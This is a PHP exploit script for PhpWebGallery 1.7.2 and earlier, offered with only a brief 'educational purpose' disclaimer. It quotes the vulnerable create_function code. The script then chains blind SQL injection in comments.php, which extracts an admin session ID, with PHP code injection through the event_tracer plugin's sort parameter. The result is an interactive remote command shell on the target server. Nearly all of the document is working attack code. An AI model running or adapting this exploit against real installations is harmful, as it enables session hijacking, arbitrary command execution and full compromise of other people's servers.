<?php /* ------------------------------------------------------------------------ PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit ------------------------------------------------------------------------ author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.phpwebgallery.net/ details..: works with at least two rows in _comments table This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /plugins/event_tracer/event_list.php 60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1; 61. usort( 62. $events, 63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' ) 64. ); An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can access to the plugins management interface, but the attacker might be able to retrieve a valid admin session id using the SQL injection bug in comments.php (see lines 325-340) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout",5); define(STDIN, fopen("php://stdin", "r")); define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/"); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again...\n"; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function check_target() { global $host, $path, $prefix, $default_record; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); $prefix = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); $default_record = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n"); } function encodeSQL($sql) { for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); return "CONCAT(0x{$encoded})"; } function get_sid() { global $host, $path, $prefix, $default_record; $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z $index = 1; $sid = ""; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; $packet .= "Connection: close\r\n\r\n"; print "\n[-] Fetching admin SID: "; while (!strpos($sid, chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die("\n\n[-] Exploit failed...try later!\n"); $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions". "/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*"; preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print "\n"; return $sid; } function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Connection: close\r\n\r\n"; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } } print "\n+---------------------------------------------------------------------------+"; print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage...: php $argv[0] host path [sid]\n"; print "\nhost....: target server (ip/hostname)"; print "\npath....: path to PhpWebGallery directory"; print "\nsid.....: a valid admin session id\n"; die(); } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = (isset($argv[3])) ? $argv[3] : get_sid(); check_plugin(); $code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nphpwebgallery-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); } else break; } ?>